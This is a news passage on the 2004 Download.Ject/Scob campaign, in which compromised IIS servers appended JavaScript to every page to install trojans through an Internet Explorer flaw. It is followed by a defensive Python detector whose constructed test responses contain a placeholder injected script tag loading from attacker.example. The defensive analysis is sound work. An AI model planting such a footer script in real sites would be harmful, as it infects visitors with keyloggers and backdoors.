The SANS Internet Storm Center, which tracks malicious Internet activity,
reported that a large number of popular Web sites were compromised earlier
this week to distribute malicious code that targets a known bug in
Microsoft Internet Explorer.
“The attacker uploaded a small file with JavaScript to infected Web
sites, and altered the web server configuration to append the script to all
files served by the web server,” the center alert warned.
If a user visited an infected site, the JavaScript delivered by the site would
instruct the user’s browser to download an executable from a Russian Web
site and install it, the alert added.
“These Trojan horse programs include keystroke loggers, proxy servers and
other back doors providing full access to the infected system.”
The center believes the attack is the work of a sophisticated
international spam ring.
“There is quite a bit of evidence that what we are
seeing is yet another technique for spreading and installing ‘spamware’ to
create proxies to relay and send spam. We don’t see any evidence that this
attack is related to the construction of a DDoS network.”
Early Friday morning, Microsoft issued a “critical” notice for the Download.Ject
malware. The software giant said it was investigating reports of
the malware targeting customers using Microsoft Internet Information
Services 5.0 (IIS) and the IE browser.
There is conflicting information on whether a patch is available to
protect against the hacker attack. Microsoft’s alert said Web servers
running Windows 2000 Server and IIS that have not applied a patch issued in
its MS04-011 advisory “are possibly being compromised and being used to
attempt to infect users of Internet Explorer with malicious code.”
However, the center said several server administrators
reported that their servers were fully patched.
“We do not know at this point how the affected servers have been
compromised,” the center’s alert said. “The SSL-PCT exploit is at the top of our list of suspects. If
you find a compromised server, we strongly recommend a complete rebuild. You
may be able to get your Web site back into business by changing the footer
setting and removing the JavaScript file. But this is likely a very
sophisticated attack and you should expect other stealthy backdoors.”
Once the attackers have broken into a Web server, the Trojan downloader
called “Scob” or “Download.Ject” is appended to the files it serves,
causing IE to execute it. “No warning will be displayed. The user does not
have to click on any links. Just visiting an infected site will trigger the
exploit.”
The center said the existing Web files on a compromised server show no
alteration. “The JavaScript is included as a global
footer and appended by the server as they are delivered to the browser. You
will find that the global footer is set to a new file,” the center said in a
note to server administrators.
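The alert's point is that the injection is invisible in the files on disk: the server appends the same script fragment to every response at delivery time, so the evidence is in what clients receive, not in the document root. The following is an added example (not code from the SANS ISC, Microsoft, or any vendor advisory) that looks for exactly that signature across a set of fetched responses: a trailing fragment shared by every page, containing a script tag, sitting after the closing </html> (or at the end of a non-HTML file). The sample responses and the host attacker.example are constructed placeholders, not data from the incident.

```python
import re
from typing import Dict, List, Optional

# Matches the src attribute of a <script> tag so the external loader can be reported.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed sample bodies (not captured traffic). Three responses from one server;
# an identical fragment has been appended to each, which is what a server-side
# "document footer" setting produces. The hostname is a placeholder.
PAGES: Dict[str, str] = {
    "/index.html": '<html><body><h1>Home</h1></body></html>\n'
                   '<script src="http://attacker.example/x.js"></script>',
    "/about.html": '<html><body><p>About us</p></body></html>\n'
                   '<script src="http://attacker.example/x.js"></script>',
    # A non-HTML file gets the footer too, which is a strong sign it is not part of the site.
    "/robots.txt": 'User-agent: *\nDisallow: /admin\n'
                   '<script src="http://attacker.example/x.js"></script>',
}

# Constructed clean responses for comparison.
CLEAN_PAGES: Dict[str, str] = {
    "/index.html": "<html><body><h1>Home</h1></body></html>",
    "/about.html": "<html><body><p>About us</p></body></html>",
}


def common_suffix(bodies: List[str]) -> str:
    """Longest suffix shared by every body. A footer appended verbatim by the
    server to each response shows up here regardless of page content."""
    if not bodies:
        return ""
    shortest = min(bodies, key=len)
    n = 0
    while n < len(shortest) and all(
        b[len(b) - n - 1] == shortest[len(shortest) - n - 1] for b in bodies
    ):
        n += 1
    return shortest[len(shortest) - n:] if n else ""


def trailing_content_after_html(body: str) -> str:
    """Whatever follows the last </html>. A well-formed page has nothing but whitespace there."""
    idx = body.lower().rfind("</html>")
    if idx == -1:
        return ""
    return body[idx + len("</html>"):].strip()


def find_injected_footer(pages: Dict[str, str]) -> Optional[dict]:
    """Return details of a script fragment common to the tail of every response,
    or None when no such fragment exists."""
    suffix = common_suffix(list(pages.values()))
    m = re.search(r"<script", suffix, re.IGNORECASE)
    if not m:
        return None
    footer = suffix[m.start():]
    return {
        "footer": footer,
        "script_sources": SCRIPT_SRC.findall(footer),
        # HTML pages where the fragment lands after </html>: the footer signature.
        "pages_with_trailing_content": sorted(
            path for path, body in pages.items()
            if footer in trailing_content_after_html(body)
        ),
        # Files with no </html> at all that still carry the fragment (e.g. robots.txt).
        "non_html_carriers": sorted(
            path for path, body in pages.items()
            if "</html>" not in body.lower() and body.endswith(footer)
        ),
    }


if __name__ == "__main__":
    for label, sample in (("suspect", PAGES), ("clean", CLEAN_PAGES)):
        print(label, find_injected_footer(sample))
```

The check deliberately works on response bodies rather than the document root, because, as the alert notes, the on-disk files are untouched. A site whose every page legitimately ends with the same inline analytics script before </body> will also produce a common script-bearing suffix; the distinguishing signal in the attack described here is that the fragment appears after </html> and on non-HTML files, which is why those two lists are reported separately rather than folded into a single yes/no.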
Advisories and disinfection instructions are available from Symantec,
F-Secure and Computer Associates.
Microsoft first reported the exploited IE vulnerability as extremely
critical on June 10, but the company has yet to issue a security fix.
“Microsoft is actively investigating these reports to determine the
appropriate course of action to protect our customers. This might include
providing a fix through our monthly release process or an out-of-cycle
security update, depending on customer needs,” Microsoft said in a statement.
Since then, malicious hackers have unleashed “zero day exploits” to load
adware